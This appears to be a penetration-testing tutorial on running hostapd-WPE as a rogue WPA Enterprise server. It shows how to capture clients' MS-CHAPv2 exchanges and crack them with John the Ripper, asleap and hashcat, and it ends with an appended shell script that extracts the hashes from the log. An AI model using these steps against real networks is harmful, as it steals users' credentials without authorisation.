
Attacks on WPA Enterprise infrastructures with hostapd-WPE
Date (last modified): 27 Apr 2020
The previous article covered the cross-compilation and installation of hostapd-WPE for OpenWrt Barrier Breaker. This article continues with the configuration and execution of hostapd-WPE on OpenWrt, with the aim of conducting security tests on WPA Enterprise (IEEE 802.1X) environments.
Hostapd-WPE impersonates the authentication server of an IEEE 802.1X (WPA Enterprise) network in order to obtain client credentials, typically the MS-CHAPv2 challenge/response pairs sent by clients over EAP-PEAP, which can then be cracked offline. It also implements the Cupid attack, which exploits the Heartbleed vulnerability (CVE-2014-0160) in the TLS handshake of clients connecting over EAP-PEAP, EAP-TLS or EAP-TTLS.
- 802.11a (5 GHz) interface configuration
- Creating custom self-signed SSL certificates (optional)
- Hostapd-WPE execution
  - Interface
  - SSID
  - Channels
  - Certificates and private key
  - Log files
- Running hostapd-WPE for OpenWrt: 802.11b/g/n access point setup
- 802.11a/ac access point setup
- Recovering client credentials by cracking WPA Enterprise hashes

Creating custom self-signed SSL certificates (optional)
After execution, the private keys and certificates will have been created. To use them with hostapd-WPE for OpenWrt, copy ca.pem, server.pem, server_no_pass.key and dh to the folder /usr/local/etc/hostapd-wpe/certs on the device.

Recovering client credentials by cracking WPA Enterprise hashes
First, the client hashes need to be extracted from the log file. Hostapd-WPE logs each captured MS-CHAPv2 exchange on a "jtr NETNTLM" line already in John the Ripper's netntlm format (user:$NETNTLM$challenge$response); the following pipeline strips the label and saves the hashes to hashes_john.txt:
cat wpe_bgn.log | grep "jtr NETNTLM" | sed 's/ [ ]*jtr NETNTLM:[ ]*//' > hashes_john.txt
John the Ripper can then be run against that file with a wordlist:
john --format=netntlm --wordlist=/usr/share/john/password.lst --rules hashes_john.txt
Alternatively, the cracking can be done with asleap by specifying the challenge and response values of a single exchange (colon-separated hex, 8 bytes of challenge and 24 bytes of response). The following command uses John the Ripper to apply its mangling rules to the dictionary words and pipes the candidates into asleap. Note that the dash after the -W parameter makes asleap read the wordlist from standard input, i.e. from John the Ripper's output:
john --wordlist=/usr/share/john/password.lst --rules --stdout | asleap -C 5d:7c:53:ac:39:0d:44:c8 -R 0b:ee:1a:9e:0c:c4:98:aa:55:1c:69:92:62:e5:d5:82:60:0c:e8:81:01:81:23:91 -W -
The hashes can also be cracked with hashcat in its NetNTLMv1/MS-CHAPv2 mode (-m 5500), using the "hashcat NETNTLM" lines that hostapd-WPE writes next to the jtr ones. Aircrack-ng and coWPAtty are not suitable for this step: they attack WPA-PSK four-way handshakes, not MS-CHAPv2 challenge/response pairs.
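The extraction step above, carried a little further as an added example (this script is not part of the original article nor of hostapd-WPE): a POSIX shell script that pulls every captured exchange out of a hostapd-WPE log, de-duplicates the hashes while keeping capture order, validates their shape (16 hex digits of challenge, 48 of response), and rebuilds the colon-separated -C/-R arguments that asleap wants from the jtr line of a chosen user. It assumes the log layout hostapd-WPE uses ("jtr NETNTLM:" and "hashcat NETNTLM:" lines following each "mschapv2:" record); the embedded log excerpt, its user names and all hex values are constructed for the example, and the file name hashes_john.txt is taken from the article.

```shell
#!/bin/sh
# Added example, not code from the original article or from hostapd-WPE:
# pull the MS-CHAPv2 challenge/response pairs out of a hostapd-WPE log and
# turn them into the inputs that john, hashcat and asleap expect.
#
# Assumption: each captured exchange is logged with a "jtr NETNTLM:" line
# (user:$NETNTLM$challenge$response) and a "hashcat NETNTLM:" line
# (user::::response:challenge). Whitespace before the label is stripped
# whatever it is (hostapd-WPE indents with tabs).

# Constructed log excerpt: alice is seen twice (a re-association yields a
# fresh challenge, hence a second hash), bob once. All hex values are made up.
SAMPLE_LOG='mschapv2: Mon Apr 27 10:00:00 2020
    username:    alice
    challenge:   5d:7c:53:ac:39:0d:44:c8
    response:    0b:ee:1a:9e:0c:c4:98:aa:55:1c:69:92:62:e5:d5:82:60:0c:e8:81:01:81:23:91
    jtr NETNTLM:        alice:$NETNTLM$5d7c53ac390d44c8$0bee1a9e0cc498aa551c699262e5d582600ce88101812391
    hashcat NETNTLM:    alice::::0bee1a9e0cc498aa551c699262e5d582600ce88101812391:5d7c53ac390d44c8
mschapv2: Mon Apr 27 10:00:05 2020
    username:    bob
    challenge:   a1:b2:c3:d4:e5:f6:07:18
    response:    00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:00:11:22:33:44:55:66:77
    jtr NETNTLM:        bob:$NETNTLM$a1b2c3d4e5f60718$00112233445566778899aabbccddeeff0011223344556677
    hashcat NETNTLM:    bob::::00112233445566778899aabbccddeeff0011223344556677:a1b2c3d4e5f60718
mschapv2: Mon Apr 27 10:02:41 2020
    username:    alice
    challenge:   01:02:03:04:05:06:07:08
    response:    ff:ee:dd:cc:bb:aa:99:88:77:66:55:44:33:22:11:00:ff:ee:dd:cc:bb:aa:99:88
    jtr NETNTLM:        alice:$NETNTLM$0102030405060708$ffeeddccbbaa99887766554433221100ffeeddccbbaa9988
    hashcat NETNTLM:    alice::::ffeeddccbbaa99887766554433221100ffeeddccbbaa9988:0102030405060708'

write_sample() { printf '%s\n' "$SAMPLE_LOG" > "$1"; }

# One hash per line for John the Ripper (--format=netntlm). Exact duplicate
# lines are dropped, but order is kept so a user's first capture stays first.
john_hashes() {
    grep 'jtr NETNTLM:' "$1" \
        | sed 's/^[[:space:]]*jtr NETNTLM:[[:space:]]*//' \
        | awk '!seen[$0]++'
}

# Same for hashcat (-m 5500): user::::response:challenge.
hashcat_hashes() {
    grep 'hashcat NETNTLM:' "$1" \
        | sed 's/^[[:space:]]*hashcat NETNTLM:[[:space:]]*//' \
        | awk '!seen[$0]++'
}

# A well-formed john line carries 8 bytes of challenge and 24 of response.
valid_john_line() {
    printf '%s\n' "$1" \
        | grep -Eq '^[^:]+:\$NETNTLM\$[0-9a-fA-F]{16}\$[0-9a-fA-F]{48}$'
}

# "5d7c53ac390d44c8" -> "5d:7c:53:ac:39:0d:44:c8", the notation asleap takes.
colonize() { printf '%s\n' "$1" | sed 's/../&:/g; s/:$//'; }

# Print "-C <challenge> -R <response>" for a user's first captured exchange;
# fails (status 1) when the user is absent or the line is malformed.
asleap_args() {
    line=$(john_hashes "$1" | grep "^$2:" | head -n 1)
    [ -n "$line" ] && valid_john_line "$line" || return 1
    chal=$(printf '%s\n' "$line" | cut -d'$' -f3)
    resp=$(printf '%s\n' "$line" | cut -d'$' -f4)
    printf '%s %s -R %s\n' '-C' "$(colonize "$chal")" "$(colonize "$resp")"
}

# Stand-alone run: use the log given as $1, or the constructed sample.
log=${1:-}
if [ -z "$log" ]; then
    log=$(mktemp)
    write_sample "$log"
fi
john_hashes "$log" > hashes_john.txt
echo "# john --format=netntlm --wordlist=/usr/share/john/password.lst --rules hashes_john.txt"
cat hashes_john.txt
echo "# hashcat -m 5500 hashes_hashcat.txt /usr/share/john/password.lst"
hashcat_hashes "$log"
first_user=$(head -n 1 hashes_john.txt | cut -d: -f1)
echo "# john --wordlist=/usr/share/john/password.lst --rules --stdout | asleap $(asleap_args "$log" "$first_user") -W -"
```

Run it with the path of the hostapd-WPE log (wpe_bgn.log in the article) as its only argument; without one it processes the embedded sample and prints the john, hashcat and asleap command lines for the hashes it found. Because the challenge changes on every authentication, the same user shows up with a different hash each time they re-associate; cracking any one of them recovers the password, so asleap_args only needs the first.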